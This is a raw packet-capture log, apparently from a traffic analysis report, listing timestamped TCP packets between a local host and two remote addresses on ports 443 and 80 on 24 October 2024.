                                                                            Oct 24, 2024 08:52:57.144774914 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.144823074 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.144831896 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.144840002 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.155602932 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.155698061 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.155814886 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.155814886 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.155833006 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.167257071 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.167287111 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.167459011 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.167459011 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.167484999 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.179073095 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.179100990 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.179275036 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.179275036 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.179275036 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.179296970 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.189826965 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.189908028 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.190141916 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.190141916 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.190160990 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.204313040 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.204349995 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.204515934 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.204515934 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.204515934 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.204545021 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.206211090 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.206235886 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.206269026 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.206286907 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.206302881 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.206302881 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.218852043 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.218893051 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.218931913 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.218951941 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.218961000 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.218961954 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.228312016 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.228341103 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.228408098 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.228408098 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.228480101 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.228545904 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.231446981 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.231473923 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.231508970 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.231530905 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.231555939 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.231555939 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.250741005 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.250762939 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.250984907 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.250998020 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.251024008 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.252100945 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.252125025 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.252160072 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.252166033 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.252175093 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.259502888 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.259533882 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.259569883 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.259579897 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.259588003 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.276019096 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.276046991 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.276101112 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.276109934 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.276118040 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.281857967 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.281888008 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.281919003 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.281924963 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.281934977 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.293857098 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.293884039 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.293930054 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.293937922 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.293946028 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.305357933 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.305382013 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.305435896 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.305448055 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.305599928 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.305599928 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.319009066 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319035053 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319086075 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.319094896 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319104910 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.319664955 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319685936 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319735050 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.319740057 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.319761038 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.328568935 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.328602076 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.328655958 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.328675985 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.328697920 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.338689089 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.338711977 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.338789940 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.338800907 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.338828087 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.345941067 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.345966101 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.346019983 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.346029997 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.346039057 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.364923000 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.364954948 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.365041971 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.365065098 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.365103960 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.365480900 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.365504026 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.365542889 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.365560055 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.365581989 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.366944075 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.366964102 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.367006063 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.367022991 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.367043018 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.391231060 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391259909 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391354084 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.391355038 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.391427040 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391808987 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391828060 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391870975 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.391896009 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.391921997 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.397865057 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.397891998 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.397948027 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.397977114 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.397989988 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.414967060 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.414994001 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.415047884 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.415047884 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.415080070 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.415098906 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.423753977 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.423780918 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.423825979 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.423851967 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.423877001 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.425601006 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.434926033 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.434947968 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.435000896 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.435029030 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.435053110 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.435509920 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.435534954 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.435570955 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.435589075 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.435611963 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.444611073 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.444632053 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.444679976 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.444701910 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.444724083 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.454587936 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.454613924 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.454654932 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.454679966 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.454701900 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.461910009 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.461937904 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.461997986 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.462022066 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.462044954 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.462044954 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.480849981 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.480884075 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.480978012 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.481014967 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.481116056 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.481251001 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.481271982 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.481317043 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.481317043 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.481333971 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.482772112 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.482795954 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.482837915 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.482837915 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.482853889 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.491085052 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.491106987 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.491166115 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.491166115 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.491178989 CEST44349167142.250.186.97192.168.2.22
                                                                            Oct 24, 2024 08:52:57.491230011 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:52:57.491615057 CEST49167443192.168.2.22142.250.186.97
                                                                            Oct 24, 2024 08:53:07.922687054 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:07.928025007 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:07.928102016 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:07.928142071 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:07.933429956 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.611896038 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.611943960 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.611958027 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.611975908 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.611989975 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612004995 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612016916 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612034082 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612047911 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612062931 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.612144947 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.612242937 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.619548082 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.619574070 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.619590998 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.619641066 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729125023 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729145050 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729170084 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729186058 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729201078 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729207993 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729276896 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729491949 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729541063 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729564905 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729718924 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729773045 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729784966 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729800940 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.729842901 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.729964972 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730437040 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730492115 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.730509043 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730513096 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.730588913 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730648994 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.730671883 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730685949 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.730727911 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.731344938 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.731400967 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.731415987 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.731456995 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.731481075 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.731494904 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.731539965 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.737624884 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.737663984 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.737692118 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.737705946 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.737716913 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.737721920 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.737765074 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.738074064 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.738131046 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.846537113 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846560955 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846586943 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846601009 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846616030 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846628904 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846636057 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.846651077 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846666098 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.846678972 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846682072 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.846725941 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.846726894 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846743107 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.846784115 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.847343922 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.847407103 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.847433090 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.847448111 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.847455978 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.847461939 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.847489119 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.847975969 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848035097 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.848040104 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848054886 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848103046 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.848120928 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848135948 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848150015 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848164082 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848167896 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.848215103 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.848895073 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848953962 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.848968029 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849008083 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.849021912 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849036932 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849050999 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849066019 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849066019 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.849114895 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.849769115 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849807024 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849822998 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849864006 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.849934101 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849947929 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849961042 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849975109 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.849982023 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.850028038 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.850672007 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.850745916 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.850760937 CEST8049168198.46.178.134192.168.2.22
                                                                            Oct 24, 2024 08:53:08.850790024 CEST4916880192.168.2.22198.46.178.134
                                                                            Oct 24, 2024 08:53:08.855839014 CEST8049168198.46.178.134192.168.2.22
